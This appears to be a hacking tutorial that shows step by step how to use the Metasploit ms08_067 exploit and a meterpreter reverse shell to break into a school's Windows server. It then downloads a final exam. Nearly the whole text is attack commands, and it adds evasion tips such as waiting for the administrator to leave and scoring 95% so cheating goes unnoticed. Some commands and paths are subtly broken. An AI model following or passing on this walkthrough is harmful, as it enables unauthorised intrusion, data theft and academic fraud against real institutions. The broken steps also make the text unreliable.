Welcome back, my fledgling hackers!
If you're like most aspiring hackers, at one time or another you've probably spent too much time playing Call of Duty and not enough time preparing for your final exams.
So for today, we'll look at how to break into your school's server to download the final exam file with the answers onto your computer. Just think of the benefits to your academic record, your Call of Duty skills, and your popularity when you show up at school with the final exams days ahead of the finals!
Of course, this is for demonstration/entertainment purposes only. Please do not break into your school's server and steal exams as it's illegal and very likely will get you kicked out of school. This is just an example of the security risks that high schools and colleges pose from using outdated systems with known vulnerabilities.
Those of you with experience with Metasploit, or have followed my previous Metasploit tutorials, know that one of my favorite exploits is the RPC buffer overflow that works so well in Windows XP, Server 2003, and sometimes even in Vista and Server 2008.
In our case here, our school is running a Windows 2003 Server that stores all the department's exams and records. So, let's use the /exploit/windows/smb/ms08_067_netapi. To find it, type:
- msf > search ms08
Metasploit displays all the exploits with ms08 in it. The one we want is second from the bottom. We can highlight it and cut/paste it into our command:
- msf > use /exploit/windows/smb/ms08_067_netapi
Now we need to set our payload. In this case, we'll use the meterpreter for Windows or /windows/meterpreter/reverse_tcp.
- msf > set payload /windows/meterpreter/reverse_tcp
Let's take a look next at the options that we need for this exploit/payload combination by typing:
- msf > show options
Now we can see that we need to set the RHOST and the LHOST.
- msf >set LHOST 192.168.1.114
- msf >set RHOST192.168.1.108
Now all we to need do is exploit and get a meterpreter prompt on that school server where we can do our dirty work.
- msf > exploit
We should now have a meterpreter shell on the school's server. Before we can even consider to download files from that server, we want to make certain that no one is on that system where we might get detected. We can run the idletime command to see whether anyone has used the system recently.
- meterpreter >idletime
As you can see, the last time someone did something on the system was just over 3 minutes ago. To be safe, let's wait a bit and hope the administrator goes home for night. The last thing we want is for the administrator to detect our attempt to download those final exams!
Once we're safe and the system has been idle for awhile, our next step is to find those exams. Meterpreter uses standard Linux commands like ls, cd, pwd, and others, so let's type lpwd (both pwd and lpwd will work).
Meterpreter responds with the / symbol indicating that we're in the root directory.
We can then type ls to get a listing of all the directories and files in the root directory. We can see a directory named ConcordUniversity. That's probably where the exams are! Let's change directories to Concord University:
- meterpreter c:\\ConcordUniversity
Note that we need to use a double \\ to navigate to this directory. This is necessary and critical.
Now we're in ConcordUniversity, we can get a directory listing by typing:
- meterprter > ls
We can see we have folders for Anthropology, Biology, Chemistry, and Economics. Since we're looking for the Biology final, let's navigate to the Biology directory.
- meterpreter > cd biology
Voilà! There's the final exam for our biology class.
Meterpreter has a built-in download feature, so all we need to do is type:
- meterpreter > download C:\\biology\exams\FinalExam
We can see that Metasploit has downloaded the FinalExam to our computer! Please note again that we do need to use the double backslash (\\) in denoting the directory of the file we want to download.
When we navigate back to our BackTrack system, we can see that the biology final is in our root directory. Yeah!
Now we are guaranteed a 95% (don't get a 100%, the instructor will be suspicious). If you have any questions, feel free to ask in the comments, or head on over to the Null Byte forum if you have questions on hacking topics unrelated to this article.